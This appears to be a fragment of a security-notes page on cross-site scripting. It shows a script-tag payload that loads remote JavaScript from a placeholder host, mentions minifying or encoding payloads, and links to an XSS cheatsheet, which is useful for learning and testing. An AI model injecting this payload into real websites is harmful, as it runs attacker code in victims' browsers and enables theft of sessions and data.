Last updated 4 years ago
Was this helpful?
<script src="http://domain.com/remote.js"></script>
Depending on the context and length of the payload, it can sometimes be minified, encoded and submitted directly in the request.
Minifier tool:
Character code encoding:
Great resources:
[Payloadsallthethings XSS Cheatsheet](" Injection" "Payloads all the things XSS cheatsheet")